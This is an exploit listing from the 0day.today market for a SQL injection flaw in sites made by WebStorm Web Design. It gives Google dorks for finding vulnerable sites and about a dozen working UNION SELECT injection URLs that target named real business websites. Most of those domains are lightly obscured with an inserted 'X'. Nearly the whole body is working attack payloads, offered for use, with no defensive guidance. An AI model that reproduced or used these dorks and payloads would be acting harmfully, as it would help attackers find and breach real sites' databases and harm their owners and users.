[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebStorm Web Design SQL Injection Vulnerability

Author
Ashiyane
Risk
[
Security Risk High
]
0day-ID
0day-ID-23955
Category
web applications
Date add
04-08-2015
Platform
php
######################
# Exploit Title : WebStorm Web Design SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.webstorm.ca
# Google Dork 1 : "Web Design and Hosting by WebStorm" inurl:listing_detail.php?id=
# Google Dork 2 : "Web Design and Hosting by WebStorm" inurl:php?id=
# Date: 2015-08-03
# Tested On : Win 8 / Mozilla Firefox
#
######################
#
# Examples and Explanations :
#
# http://www.maconcoXnstruction.ca/listing_detail.php?id=-70' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+
# http://www.danielleXbeitz.com/listing_detail.php?id=-210' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+
# http://www.cabincXountry.com/listing_detail.php?id=-735' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97--+
# http://www.allreaXlestatematters.ca/listing_detail.php?id=-290' /*!50000UNION*/ SELECT 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98--+
# http://www.edmXonton4real.com/listing_detail.php?id=-76' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--+
# http://www.bclXands.ca/listing_detail.php?id=-190' /*!50000UNION*/ SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119--+
# http://www.richdalehXomes.com/listing_detail.php?id=-4' /*!50000UNION*/ SELECT 1,2,3,4,5,version(),7,8,9,10--+
# http://www.okanagXanclinicaltrials.com/psychiatry-column-article-detail.php?id=-395' /*!50000UNION*/ SELECT 1,version(),3,4--+
# http://www.classicXautobodyrepairs.com/listing_detail.php?id=-12' /*!50000UNION*/ SELECT 1,2,3,4,5,6,version(),8,9,10,11--+
# http://www.valhaXlco.com/wood-stain-news-detail.php?id=-13' /*!50000UNION*/ SELECT 1,2,3,version(),5,6,7,8--+
# http://www.solidsuperstore.ca/listing_detail.php?id=-189%27%20/*!50000UNION*/%20SELECT%201,2,3,4,5,version%28%29,7,8,9--+
# http://www.taylorprotraiXning.com/course_detail.php?id=-26%27%20/*!50000UNION*/%20SELECT%201,2,3,4,5,6,version%28%29,8,9,10,11,12--+
#
# And ...
#
######################
# discovered by : Naji
######################

#  0day.today [2024-12-25]  #